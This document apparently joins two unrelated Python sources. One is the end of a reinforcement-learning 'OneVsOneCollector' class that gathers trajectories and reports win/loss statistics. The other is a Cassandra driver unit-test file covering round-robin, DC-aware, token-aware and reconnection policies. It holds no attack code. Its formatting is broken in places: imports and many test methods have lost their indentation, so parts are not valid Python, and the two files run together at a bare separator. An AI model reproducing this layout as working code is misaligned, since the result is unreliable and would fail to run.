                        self._traj_buffer[env_id][i].append(transition)
                full_indices = []
                for i in range(len(self._traj_buffer[env_id])):
                    if len(self._traj_buffer[env_id][i]) == self._traj_len:
                        full_indices.append(i)
                if t[0].done or len(full_indices) > 0:
                    for i in full_indices:
                        train_sample = self._policy[i].get_train_sample(self._traj_buffer[env_id][i])
                        for s in train_sample:
                            s = self._compressor(s)
                            self._total_sample += 1
                            metadata = self._get_metadata(s, env_id)
                            self.send_stepdata(metadata['data_id'], s)
                            self.send_metadata(metadata)
                        self._traj_buffer[env_id][i].clear()
            if t[0].done:
                # env reset is done by env_manager automatically
                self._obs_pool.reset(env_id)
                self._policy_output_pool.reset(env_id)
                for p in self._policy:
                    p.reset([env_id])
                reward = t[0].info['final_eval_reward']
                # Only left player's reward will be recorded.
                left_reward = reward[0]
                if isinstance(left_reward, torch.Tensor):
                    left_reward = left_reward.item()
                self._episode_result[env_id].append(left_reward)
                self.debug(
                    "Env {} finish episode, final reward: {}, collected episode: {}.".format(
                        env_id, reward, len(self._episode_result[env_id])
                    )
                )
            # NOTE(review): _total_step is already incremented at the top of this
            # loop body, so each timestep is counted twice - confirm whether this
            # second increment is intentional.
            self._total_step += 1
        dones = [t.done for t in timestep.values()]
        if any(dones):
            collector_info = self._get_collector_info()
            self.send_metadata(collector_info)

    # override
    def get_finish_info(self) -> dict:
        """Summarize the whole collection run (timings, counts, win/loss results)."""
        duration = max(time.time() - self._start_time, 1e-8)
        game_result = copy.deepcopy(self._episode_result)
        # Map the left player's reward sign to a win/draw/loss label
        for i, env_result in enumerate(game_result):
            for j, rew in enumerate(env_result):
                if rew < 0:
                    game_result[i][j] = "losses"
                elif rew == 0:
                    game_result[i][j] = "draws"
                else:
                    game_result[i][j] = "wins"
        finish_info = {
            # 'finished_task': True,  # flag
            'eval_flag': self._eval_flag,
            # 'episode_num': self._episode_num,
            'env_num': self._env_num,
            'duration': duration,
            'collector_done': self._env_manager.done,
            'predefined_episode_count': self._predefined_episode_count,
            'real_episode_count': self._total_episode,
            'step_count': self._total_step,
            'sample_count': self._total_sample,
            'avg_time_per_episode': duration / max(1, self._total_episode),
            'avg_time_per_step': duration / self._total_step,
            'avg_time_per_train_sample': duration / max(1, self._total_sample),
            'avg_step_per_episode': self._total_step / max(1, self._total_episode),
            'avg_sample_per_episode': self._total_sample / max(1, self._total_episode),
            'reward_mean': np.mean(self._episode_result),
            'reward_std': np.std(self._episode_result),
            'reward_raw': self._episode_result,
            'finish_time': time.time(),
            'game_result': game_result,
        }
        if not self._eval_flag:
            finish_info['collect_setting'] = self._cfg.collect_setting
        self._logger.info('\nFINISH INFO\n{}'.format(pretty_print(finish_info, direct_print=False)))
        return finish_info

    # override
    def _update_policy(self) -> None:
        """Reload the weights of every active policy from its update path."""
        path = self._cfg.policy_update_path
        self._policy_is_active = self._cfg.policy_update_flag
        for i in range(len(path)):
            # if not self._first_update_policy and not self._policy_is_active[i]:
            if not self._policy_is_active[i]:
                # For the first time, all policies should be updated(i.e. initialized);
                # For other times, only active player's policies should be updated.
                continue
            # Retry until the update info can be fetched
            while True:
                try:
                    policy_update_info = self.get_policy_update_info(path[i])
                    break
                except Exception as e:
                    self.error('Policy {} update error: {}'.format(i + 1, e))
                    time.sleep(1)
            if policy_update_info is None:
                continue
            self._policy_iter[i] = policy_update_info.pop('iter')
            self._policy[i].load_state_dict(policy_update_info)
            self.debug('Update policy {} with {}(iter{}) in {}'.format(i + 1, path, self._policy_iter, time.time()))
        # self._first_update_policy = False

    # ******************************** thread **************************************
    def _update_policy_periodically(self) -> None:
        """Background loop: refresh policy weights every 'update_policy_second' seconds."""
        last = time.time()
        while not self._end_flag:
            cur = time.time()
            interval = cur - last
            if interval < self._cfg.update_policy_second:
                time.sleep(self._cfg.update_policy_second * 0.1)
                continue
            else:
                self._update_policy()
                last = time.time()
            time.sleep(0.1)

    def _get_metadata(self, stepdata: List, env_id: int) -> dict:
        """Build the metadata dict describing one compressed train sample."""
        data_id = "env_{}_{}".format(env_id, str(uuid.uuid1()))
        metadata = {
            'eval_flag': self._eval_flag,
            'data_id': data_id,
            'env_id': env_id,
            'policy_iter': self._policy_iter,
            'unroll_len': len(stepdata),
            'compressor': self._cfg.compressor,
            'get_data_time': time.time(),
            # TODO(nyz) the relationship between traj priority and step priority
            'priority': 1.0,
            'cur_episode': self._total_episode,
            'cur_sample': self._total_sample,
            'cur_step': self._total_step,
        }
        return metadata

    def _get_collector_info(self) -> dict:
        """Snapshot of the collector's progress counters."""
        return {
            'eval_flag': self._eval_flag,
            'get_info_time': time.time(),
            'collector_done': self._env_manager.done,
            'cur_episode': self._total_episode,
            'cur_sample': self._total_sample,
            'cur_step': self._total_step,
        }

    def __repr__(self) -> str:
        return "OneVsOneCollector"
|
test_policies.py | # Copyright 2013-2016 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
from itertools import islice, cycle
from mock import Mock
from random import randint
import six
import sys
import struct
from threading import Thread
from cassandra import ConsistencyLevel
from cassandra.cluster import Cluster
from cassandra.metadata import Metadata
from cassandra.policies import (RoundRobinPolicy, WhiteListRoundRobinPolicy, DCAwareRoundRobinPolicy,
TokenAwarePolicy, SimpleConvictionPolicy,
HostDistance, ExponentialReconnectionPolicy,
RetryPolicy, WriteType,
DowngradingConsistencyRetryPolicy, ConstantReconnectionPolicy,
LoadBalancingPolicy, ConvictionPolicy, ReconnectionPolicy, FallthroughRetryPolicy)
from cassandra.pool import Host
from cassandra.query import Statement
from six.moves import xrange
class LoadBalancingPolicyTest(unittest.TestCase):

    def test_non_implemented(self):
        """
        Code coverage for interface-style base class
        """
        policy = LoadBalancingPolicy()
        host = Host("ip1", SimpleConvictionPolicy)
        host.set_location_info("dc1", "rack1")

        # Every hook on the abstract-style base class must raise
        self.assertRaises(NotImplementedError, policy.distance, host)
        self.assertRaises(NotImplementedError, policy.populate, None, host)
        self.assertRaises(NotImplementedError, policy.make_query_plan)
        for hook in (policy.on_up, policy.on_down, policy.on_add, policy.on_remove):
            self.assertRaises(NotImplementedError, hook, host)

    def test_instance_check(self):
        # Passing the policy class (instead of an instance) must be rejected
        self.assertRaises(TypeError, Cluster, load_balancing_policy=RoundRobinPolicy)
class RoundRobinPolicyTest(unittest.TestCase):

    def test_basic(self):
        hosts = [0, 1, 2, 3]
        policy = RoundRobinPolicy()
        policy.populate(None, hosts)
        qplan = list(policy.make_query_plan())
        self.assertEqual(sorted(qplan), hosts)

    def test_multiple_query_plans(self):
        hosts = [0, 1, 2, 3]
        policy = RoundRobinPolicy()
        policy.populate(None, hosts)
        for i in xrange(20):
            qplan = list(policy.make_query_plan())
            self.assertEqual(sorted(qplan), hosts)

    def test_single_host(self):
        policy = RoundRobinPolicy()
        policy.populate(None, [0])
        qplan = list(policy.make_query_plan())
        self.assertEqual(qplan, [0])

    def test_status_updates(self):
        hosts = [0, 1, 2, 3]
        policy = RoundRobinPolicy()
        policy.populate(None, hosts)
        policy.on_down(0)
        policy.on_remove(1)
        policy.on_up(4)
        policy.on_add(5)
        qplan = list(policy.make_query_plan())
        self.assertEqual(sorted(qplan), [2, 3, 4, 5])

    def test_thread_safety(self):
        # Fix: materialize the hosts so the equality check passes on Python 3,
        # where sorted(...) (a list) never equals a range object.
        hosts = list(range(100))
        policy = RoundRobinPolicy()
        policy.populate(None, hosts)

        def check_query_plan():
            for i in range(100):
                qplan = list(policy.make_query_plan())
                self.assertEqual(sorted(qplan), hosts)

        threads = [Thread(target=check_query_plan) for i in range(4)]
        # Fix: map() is lazy on Python 3, so the original
        # map(lambda t: t.start(), threads) never started (or joined) a thread.
        for t in threads:
            t.start()
        for t in threads:
            t.join()

    def test_thread_safety_during_modification(self):
        # Fix: materialize the hosts (see test_thread_safety)
        hosts = list(range(100))
        policy = RoundRobinPolicy()
        policy.populate(None, hosts)
        errors = []

        def check_query_plan():
            try:
                for i in xrange(100):
                    list(policy.make_query_plan())
            except Exception as exc:
                errors.append(exc)

        def host_up():
            for i in xrange(1000):
                policy.on_up(randint(0, 99))

        def host_down():
            for i in xrange(1000):
                policy.on_down(randint(0, 99))

        threads = []
        for i in range(5):
            threads.append(Thread(target=check_query_plan))
            threads.append(Thread(target=host_up))
            threads.append(Thread(target=host_down))

        # make the GIL switch after every instruction, maximizing
        # the chance of race conditions
        check = six.PY2 or '__pypy__' in sys.builtin_module_names
        if check:
            original_interval = sys.getcheckinterval()
        else:
            original_interval = sys.getswitchinterval()

        try:
            if check:
                sys.setcheckinterval(0)
            else:
                sys.setswitchinterval(0.0001)
            # Fix: start and join the threads with real loops; the lazy map()
            # calls on Python 3 meant no worker thread ever ran.
            for t in threads:
                t.start()
            for t in threads:
                t.join()
        finally:
            if check:
                sys.setcheckinterval(original_interval)
            else:
                sys.setswitchinterval(original_interval)

        if errors:
            self.fail("Saw errors: %s" % (errors,))

    def test_no_live_nodes(self):
        """
        Ensure query plan for a downed cluster will execute without errors
        """
        hosts = [0, 1, 2, 3]
        policy = RoundRobinPolicy()
        policy.populate(None, hosts)
        for i in range(4):
            policy.on_down(i)
        qplan = list(policy.make_query_plan())
        self.assertEqual(qplan, [])
class DCAwareRoundRobinPolicyTest(unittest.TestCase):
def test_no_remote(self):
hosts = []
for i in range(4):
h = Host(i, SimpleConvictionPolicy)
h.set_location_info("dc1", "rack1")
hosts.append(h)
policy = DCAwareRoundRobinPolicy("dc1")
policy.populate(None, hosts)
qplan = list(policy.make_query_plan())
self.assertEqual(sorted(qplan), sorted(hosts))
def test_with_remotes(self):
hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
for h in hosts[:2]:
h.set_location_info("dc1", "rack1")
for h in hosts[2:]:
h.set_location_info("dc2", "rack1")
local_hosts = set(h for h in hosts if h.datacenter == "dc1")
remote_hosts = set(h for h in hosts if h.datacenter != "dc1")
# allow all of the remote hosts to be used
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=2)
policy.populate(Mock(), hosts)
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan[:2]), local_hosts)
self.assertEqual(set(qplan[2:]), remote_hosts)
# allow only one of the remote hosts to be used
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
policy.populate(Mock(), hosts)
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan[:2]), local_hosts)
used_remotes = set(qplan[2:])
self.assertEqual(1, len(used_remotes))
self.assertIn(qplan[2], remote_hosts)
# allow no remote hosts to be used
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=0)
policy.populate(Mock(), hosts)
qplan = list(policy.make_query_plan())
self.assertEqual(2, len(qplan))
self.assertEqual(local_hosts, set(qplan))
def test_get_distance(self):
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=0)
host = Host("ip1", SimpleConvictionPolicy)
host.set_location_info("dc1", "rack1")
policy.populate(Mock(), [host])
self.assertEqual(policy.distance(host), HostDistance.LOCAL)
# used_hosts_per_remote_dc is set to 0, so ignore it
remote_host = Host("ip2", SimpleConvictionPolicy)
remote_host.set_location_info("dc2", "rack1")
self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)
# dc2 isn't registered in the policy's live_hosts dict
policy.used_hosts_per_remote_dc = 1
self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)
# make sure the policy has both dcs registered
policy.populate(Mock(), [host, remote_host])
self.assertEqual(policy.distance(remote_host), HostDistance.REMOTE)
# since used_hosts_per_remote_dc is set to 1, only the first
# remote host in dc2 will be REMOTE, the rest are IGNORED
second_remote_host = Host("ip3", SimpleConvictionPolicy)
second_remote_host.set_location_info("dc2", "rack1")
policy.populate(Mock(), [host, remote_host, second_remote_host])
distances = set([policy.distance(remote_host), policy.distance(second_remote_host)])
self.assertEqual(distances, set([HostDistance.REMOTE, HostDistance.IGNORED]))
def test_status_updates(self):
hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
for h in hosts[:2]:
h.set_location_info("dc1", "rack1")
for h in hosts[2:]:
h.set_location_info("dc2", "rack1")
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
policy.populate(Mock(), hosts)
policy.on_down(hosts[0])
policy.on_remove(hosts[2])
new_local_host = Host(4, SimpleConvictionPolicy)
new_local_host.set_location_info("dc1", "rack1")
policy.on_up(new_local_host)
new_remote_host = Host(5, SimpleConvictionPolicy)
new_remote_host.set_location_info("dc9000", "rack1")
policy.on_add(new_remote_host)
# we now have two local hosts and two remote hosts in separate dcs
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan[:2]), set([hosts[1], new_local_host]))
self.assertEqual(set(qplan[2:]), set([hosts[3], new_remote_host]))
# since we have hosts in dc9000, the distance shouldn't be IGNORED
self.assertEqual(policy.distance(new_remote_host), HostDistance.REMOTE)
policy.on_down(new_local_host)
policy.on_down(hosts[1])
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan), set([hosts[3], new_remote_host]))
policy.on_down(new_remote_host)
policy.on_down(hosts[3])
qplan = list(policy.make_query_plan())
self.assertEqual(qplan, [])
def test_modification_during_generation(self):
    """
    Grey-box test: mutate the policy's internal host lists at known phases
    of make_query_plan() generation, then verify how many hosts each plan
    still yields. Expected counts are written as `local + remote`.
    """
    hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
    for h in hosts[:2]:
        h.set_location_info("dc1", "rack1")
    for h in hosts[2:]:
        h.set_location_info("dc2", "rack1")

    policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=3)
    policy.populate(Mock(), hosts)

    # The general concept here is to change the internal state of the
    # policy during plan generation. In this case we use a grey-box
    # approach that changes specific things during known phases of the
    # generator.

    new_host = Host(4, SimpleConvictionPolicy)
    new_host.set_location_info("dc1", "rack1")

    # new local before iteration
    plan = policy.make_query_plan()
    policy.on_up(new_host)
    # local list is not bound yet, so we get to see that one
    self.assertEqual(len(list(plan)), 3 + 2)

    # remove local before iteration
    plan = policy.make_query_plan()
    policy.on_down(new_host)
    # local list is not bound yet, so we don't see it
    self.assertEqual(len(list(plan)), 2 + 2)

    # new local after starting iteration
    plan = policy.make_query_plan()
    next(plan)
    policy.on_up(new_host)
    # local list was bound, and one consumed, so we only see the other original
    self.assertEqual(len(list(plan)), 1 + 2)

    # remove local after traversing available
    plan = policy.make_query_plan()
    for _ in range(3):
        next(plan)
    policy.on_down(new_host)
    # we should be past the local list
    self.assertEqual(len(list(plan)), 0 + 2)

    # REMOTES CHANGE
    new_host.set_location_info("dc2", "rack1")

    # new remote after traversing local, but not starting remote
    plan = policy.make_query_plan()
    for _ in range(2):
        next(plan)
    policy.on_up(new_host)
    # list is updated before we get to it
    self.assertEqual(len(list(plan)), 0 + 3)

    # remove remote after traversing local, but not starting remote
    plan = policy.make_query_plan()
    for _ in range(2):
        next(plan)
    policy.on_down(new_host)
    # list is updated before we get to it
    self.assertEqual(len(list(plan)), 0 + 2)

    # new remote after traversing local, and starting remote
    plan = policy.make_query_plan()
    for _ in range(3):
        next(plan)
    policy.on_up(new_host)
    # slice is already made, and we've consumed one
    self.assertEqual(len(list(plan)), 0 + 1)

    # remove remote after traversing local, and starting remote
    plan = policy.make_query_plan()
    for _ in range(3):
        next(plan)
    policy.on_down(new_host)
    # slice is created with all present, and we've consumed one
    self.assertEqual(len(list(plan)), 0 + 2)

    # local DC disappears after finishing it, but not starting remote
    plan = policy.make_query_plan()
    for _ in range(2):
        next(plan)
    policy.on_down(hosts[0])
    policy.on_down(hosts[1])
    # dict traversal starts as normal
    self.assertEqual(len(list(plan)), 0 + 2)
    policy.on_up(hosts[0])
    policy.on_up(hosts[1])

    # PYTHON-297 addresses the following cases, where DCs come and go
    # during generation

    # local DC disappears after finishing it, and starting remote
    plan = policy.make_query_plan()
    for _ in range(3):
        next(plan)
    policy.on_down(hosts[0])
    policy.on_down(hosts[1])
    # dict traversal has begun and consumed one
    self.assertEqual(len(list(plan)), 0 + 1)
    policy.on_up(hosts[0])
    policy.on_up(hosts[1])

    # remote DC disappears after finishing local, but not starting remote
    plan = policy.make_query_plan()
    for _ in range(2):
        next(plan)
    policy.on_down(hosts[2])
    policy.on_down(hosts[3])
    # nothing left
    self.assertEqual(len(list(plan)), 0 + 0)
    policy.on_up(hosts[2])
    policy.on_up(hosts[3])

    # remote DC disappears while traversing it
    plan = policy.make_query_plan()
    for _ in range(3):
        next(plan)
    policy.on_down(hosts[2])
    policy.on_down(hosts[3])
    # we continue with remainder of original list
    self.assertEqual(len(list(plan)), 0 + 1)
    policy.on_up(hosts[2])
    policy.on_up(hosts[3])

    another_host = Host(5, SimpleConvictionPolicy)
    another_host.set_location_info("dc3", "rack1")
    new_host.set_location_info("dc3", "rack1")

    # new DC while traversing remote
    plan = policy.make_query_plan()
    for _ in range(3):
        next(plan)
    policy.on_up(new_host)
    policy.on_up(another_host)
    # we continue with remainder of original list
    self.assertEqual(len(list(plan)), 0 + 1)

    # remote DC disappears after finishing it
    plan = policy.make_query_plan()
    for _ in range(3):
        next(plan)
    last_host_in_this_dc = next(plan)
    if last_host_in_this_dc in (new_host, another_host):
        # the DC just finished was dc3; take it down
        down_hosts = [new_host, another_host]
    else:
        # the DC just finished was dc2; take it down
        down_hosts = hosts[2:]
    for h in down_hosts:
        policy.on_down(h)
    # the last DC has two
    self.assertEqual(len(list(plan)), 0 + 2)
def test_no_live_nodes(self):
    """Query plan generation on a fully-downed cluster must not raise."""
    hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
    for h in hosts:
        h.set_location_info("dc1", "rack1")

    policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
    policy.populate(Mock(), hosts)

    # mark every host down
    for h in hosts:
        policy.on_down(h)

    self.assertEqual(list(policy.make_query_plan()), [])
def test_no_nodes(self):
    """Query plan for an empty cluster must come back empty, without errors."""
    policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
    policy.populate(None, [])
    self.assertEqual(list(policy.make_query_plan()), [])
def test_default_dc(self):
    """Without an explicit local DC, the first DC seen from a contact point wins."""
    host_local = Host(1, SimpleConvictionPolicy, 'local')
    host_remote = Host(2, SimpleConvictionPolicy, 'remote')
    host_none = Host(1, SimpleConvictionPolicy)

    # contact point is '1'
    cluster = Mock(contact_points_resolved=[1])

    def fresh_policy():
        # A policy that has only seen the DC-less contact point; no local DC yet.
        p = DCAwareRoundRobinPolicy()
        p.populate(cluster, [host_none])
        self.assertFalse(p.local_dc)
        return p

    # contact DC arrives first
    policy = fresh_policy()
    policy.on_add(host_local)
    policy.on_add(host_remote)
    self.assertNotEqual(policy.local_dc, host_remote.datacenter)
    self.assertEqual(policy.local_dc, host_local.datacenter)

    # contact DC arrives second
    policy = fresh_policy()
    policy.on_add(host_remote)
    policy.on_add(host_local)
    self.assertNotEqual(policy.local_dc, host_remote.datacenter)
    self.assertEqual(policy.local_dc, host_local.datacenter)

    # added host carries no DC: local DC stays unset
    policy = fresh_policy()
    policy.on_add(host_none)
    self.assertFalse(policy.local_dc)

    # only a non-contact-point DC appears: local DC stays unset
    policy = fresh_policy()
    policy.on_add(host_remote)
    self.assertFalse(policy.local_dc)
class TokenAwarePolicyTest(unittest.TestCase):
    """Tests for TokenAwarePolicy wrapping round-robin and DC-aware child policies."""

    def test_wrap_round_robin(self):
        """Replicas for the routing key lead the plan; remaining hosts follow."""
        cluster = Mock(spec=Cluster)
        cluster.metadata = Mock(spec=Metadata)
        hosts = [Host(str(i), SimpleConvictionPolicy) for i in range(4)]
        for host in hosts:
            host.set_up()

        def get_replicas(keyspace, packed_key):
            # map the packed routing key to two consecutive hosts, wrapping around
            index = struct.unpack('>i', packed_key)[0]
            return list(islice(cycle(hosts), index, index + 2))

        cluster.metadata.get_replicas.side_effect = get_replicas

        policy = TokenAwarePolicy(RoundRobinPolicy())
        policy.populate(cluster, hosts)

        for i in range(4):
            query = Statement(routing_key=struct.pack('>i', i), keyspace='keyspace_name')
            qplan = list(policy.make_query_plan(None, query))

            replicas = get_replicas(None, struct.pack('>i', i))
            other = set(h for h in hosts if h not in replicas)
            self.assertEqual(replicas, qplan[:2])
            self.assertEqual(other, set(qplan[2:]))

        # Should use the secondary policy
        for i in range(4):
            qplan = list(policy.make_query_plan())
            self.assertEqual(set(qplan), set(hosts))

    def test_wrap_dc_aware(self):
        """Local replica first, then local non-replica, then capped remotes."""
        cluster = Mock(spec=Cluster)
        cluster.metadata = Mock(spec=Metadata)
        hosts = [Host(str(i), SimpleConvictionPolicy) for i in range(4)]
        for host in hosts:
            host.set_up()
        for h in hosts[:2]:
            h.set_location_info("dc1", "rack1")
        for h in hosts[2:]:
            h.set_location_info("dc2", "rack1")

        def get_replicas(keyspace, packed_key):
            index = struct.unpack('>i', packed_key)[0]
            # return one node from each DC
            if index % 2 == 0:
                return [hosts[0], hosts[2]]
            else:
                return [hosts[1], hosts[3]]

        cluster.metadata.get_replicas.side_effect = get_replicas

        policy = TokenAwarePolicy(DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1))
        policy.populate(cluster, hosts)

        for i in range(4):
            query = Statement(routing_key=struct.pack('>i', i), keyspace='keyspace_name')
            qplan = list(policy.make_query_plan(None, query))
            replicas = get_replicas(None, struct.pack('>i', i))

            # first should be the only local replica
            self.assertIn(qplan[0], replicas)
            self.assertEqual(qplan[0].datacenter, "dc1")

            # then the local non-replica
            self.assertNotIn(qplan[1], replicas)
            self.assertEqual(qplan[1].datacenter, "dc1")

            # then one of the remotes (used_hosts_per_remote_dc is 1, so we
            # shouldn't see two remotes)
            self.assertEqual(qplan[2].datacenter, "dc2")
            self.assertEqual(3, len(qplan))

    class FakeCluster:
        # minimal stand-in providing only the metadata attribute the policy reads
        def __init__(self):
            self.metadata = Mock(spec=Metadata)

    def test_get_distance(self):
        """
        Same test as DCAwareRoundRobinPolicyTest.test_get_distance()
        Except a FakeCluster is needed for the metadata variable and
        policy.child_policy is needed to change child policy settings
        """
        policy = TokenAwarePolicy(DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=0))
        host = Host("ip1", SimpleConvictionPolicy)
        host.set_location_info("dc1", "rack1")
        policy.populate(self.FakeCluster(), [host])

        self.assertEqual(policy.distance(host), HostDistance.LOCAL)

        # used_hosts_per_remote_dc is set to 0, so ignore it
        remote_host = Host("ip2", SimpleConvictionPolicy)
        remote_host.set_location_info("dc2", "rack1")
        self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)

        # dc2 isn't registered in the policy's live_hosts dict
        policy._child_policy.used_hosts_per_remote_dc = 1
        self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)

        # make sure the policy has both dcs registered
        policy.populate(self.FakeCluster(), [host, remote_host])
        self.assertEqual(policy.distance(remote_host), HostDistance.REMOTE)

        # since used_hosts_per_remote_dc is set to 1, only the first
        # remote host in dc2 will be REMOTE, the rest are IGNORED
        second_remote_host = Host("ip3", SimpleConvictionPolicy)
        second_remote_host.set_location_info("dc2", "rack1")
        policy.populate(self.FakeCluster(), [host, remote_host, second_remote_host])
        distances = set([policy.distance(remote_host), policy.distance(second_remote_host)])
        self.assertEqual(distances, set([HostDistance.REMOTE, HostDistance.IGNORED]))

    def test_status_updates(self):
        """
        Same test as DCAwareRoundRobinPolicyTest.test_status_updates()
        """
        hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
        for h in hosts[:2]:
            h.set_location_info("dc1", "rack1")
        for h in hosts[2:]:
            h.set_location_info("dc2", "rack1")

        policy = TokenAwarePolicy(DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1))
        policy.populate(self.FakeCluster(), hosts)
        policy.on_down(hosts[0])
        policy.on_remove(hosts[2])

        new_local_host = Host(4, SimpleConvictionPolicy)
        new_local_host.set_location_info("dc1", "rack1")
        policy.on_up(new_local_host)

        new_remote_host = Host(5, SimpleConvictionPolicy)
        new_remote_host.set_location_info("dc9000", "rack1")
        policy.on_add(new_remote_host)

        # we now have two local hosts and two remote hosts in separate dcs
        qplan = list(policy.make_query_plan())
        self.assertEqual(set(qplan[:2]), set([hosts[1], new_local_host]))
        self.assertEqual(set(qplan[2:]), set([hosts[3], new_remote_host]))

        # since we have hosts in dc9000, the distance shouldn't be IGNORED
        self.assertEqual(policy.distance(new_remote_host), HostDistance.REMOTE)

        policy.on_down(new_local_host)
        policy.on_down(hosts[1])
        qplan = list(policy.make_query_plan())
        self.assertEqual(set(qplan), set([hosts[3], new_remote_host]))

        policy.on_down(new_remote_host)
        policy.on_down(hosts[3])
        qplan = list(policy.make_query_plan())
        self.assertEqual(qplan, [])

    def test_statement_keyspace(self):
        """The statement's keyspace takes precedence over the working keyspace for routing."""
        hosts = [Host(str(i), SimpleConvictionPolicy) for i in range(4)]
        for host in hosts:
            host.set_up()

        cluster = Mock(spec=Cluster)
        cluster.metadata = Mock(spec=Metadata)
        replicas = hosts[2:]
        cluster.metadata.get_replicas.return_value = replicas

        child_policy = Mock()
        child_policy.make_query_plan.return_value = hosts
        child_policy.distance.return_value = HostDistance.LOCAL

        policy = TokenAwarePolicy(child_policy)
        policy.populate(cluster, hosts)

        # no keyspace, child policy is called
        keyspace = None
        routing_key = 'routing_key'
        query = Statement(routing_key=routing_key)
        qplan = list(policy.make_query_plan(keyspace, query))
        self.assertEqual(hosts, qplan)
        self.assertEqual(cluster.metadata.get_replicas.call_count, 0)
        child_policy.make_query_plan.assert_called_once_with(keyspace, query)

        # working keyspace, no statement
        cluster.metadata.get_replicas.reset_mock()
        keyspace = 'working_keyspace'
        routing_key = 'routing_key'
        query = Statement(routing_key=routing_key)
        qplan = list(policy.make_query_plan(keyspace, query))
        self.assertEqual(replicas + hosts[:2], qplan)
        cluster.metadata.get_replicas.assert_called_with(keyspace, routing_key)

        # statement keyspace, no working
        cluster.metadata.get_replicas.reset_mock()
        working_keyspace = None
        statement_keyspace = 'statement_keyspace'
        routing_key = 'routing_key'
        query = Statement(routing_key=routing_key, keyspace=statement_keyspace)
        qplan = list(policy.make_query_plan(working_keyspace, query))
        self.assertEqual(replicas + hosts[:2], qplan)
        cluster.metadata.get_replicas.assert_called_with(statement_keyspace, routing_key)

        # both keyspaces set, statement keyspace used for routing
        cluster.metadata.get_replicas.reset_mock()
        working_keyspace = 'working_keyspace'
        statement_keyspace = 'statement_keyspace'
        routing_key = 'routing_key'
        query = Statement(routing_key=routing_key, keyspace=statement_keyspace)
        qplan = list(policy.make_query_plan(working_keyspace, query))
        self.assertEqual(replicas + hosts[:2], qplan)
        cluster.metadata.get_replicas.assert_called_with(statement_keyspace, routing_key)
class ConvictionPolicyTest(unittest.TestCase):
    def test_not_implemented(self):
        """The interface-style base class must refuse to do any actual work."""
        conviction_policy = ConvictionPolicy(1)
        with self.assertRaises(NotImplementedError):
            conviction_policy.add_failure(1)
        with self.assertRaises(NotImplementedError):
            conviction_policy.reset()
class SimpleConvictionPolicyTest(unittest.TestCase):
    def test_basic_responses(self):
        """SimpleConvictionPolicy always convicts on failure; reset is a no-op."""
        conviction_policy = SimpleConvictionPolicy(1)
        self.assertEqual(True, conviction_policy.add_failure(1))
        self.assertEqual(None, conviction_policy.reset())
class ReconnectionPolicyTest(unittest.TestCase):
    def test_basic_responses(self):
        """Interface-style base class: new_schedule() must be abstract."""
        with self.assertRaises(NotImplementedError):
            ReconnectionPolicy().new_schedule()
class ConstantReconnectionPolicyTest(unittest.TestCase):
    def test_bad_vals(self):
        """
        Test initialization values: a negative delay must be rejected.
        """
        self.assertRaises(ValueError, ConstantReconnectionPolicy, -1, 0)

    def test_schedule(self):
        """
        Test ConstantReconnectionPolicy schedule: exactly max_attempts
        entries, each equal to the configured delay.
        """
        delay = 2
        max_attempts = 100
        policy = ConstantReconnectionPolicy(delay=delay, max_attempts=max_attempts)
        schedule = list(policy.new_schedule())
        self.assertEqual(len(schedule), max_attempts)
        # BUG FIX: the loop variable used to shadow `delay`, turning the
        # assertion into `assertEqual(delay, delay)` which could never fail.
        # Compare each scheduled value against the configured constant.
        for scheduled_delay in schedule:
            self.assertEqual(scheduled_delay, delay)

    def test_schedule_negative_max_attempts(self):
        """
        Test how negative max_attempts are handled: ValueError expected.
        """
        delay = 2
        max_attempts = -100
        try:
            ConstantReconnectionPolicy(delay=delay, max_attempts=max_attempts)
            self.fail('max_attempts should throw ValueError when negative')
        except ValueError:
            pass

    def test_schedule_infinite_attempts(self):
        """max_attempts=None yields an unbounded constant schedule."""
        delay = 2
        max_attempts = None
        crp = ConstantReconnectionPolicy(delay=delay, max_attempts=max_attempts)
        # this is infinite. we'll just verify one more than default
        for _, d in zip(range(65), crp.new_schedule()):
            self.assertEqual(d, delay)
class ExponentialReconnectionPolicyTest(unittest.TestCase):
    def test_bad_vals(self):
        """Negative delays, inverted bounds, and negative attempts are rejected."""
        for bad_args in ((-1, 0), (0, -1), (9000, 1), (1, 2, -1)):
            self.assertRaises(ValueError, ExponentialReconnectionPolicy, *bad_args)

    def test_schedule_no_max(self):
        """An unbounded schedule starts at base_delay and saturates at max_delay."""
        base_delay, max_delay, test_iter = 2, 100, 10000
        policy = ExponentialReconnectionPolicy(base_delay=base_delay, max_delay=max_delay, max_attempts=None)
        sched_slice = list(islice(policy.new_schedule(), 0, test_iter))
        self.assertEqual(len(sched_slice), test_iter)
        self.assertEqual(sched_slice[0], base_delay)
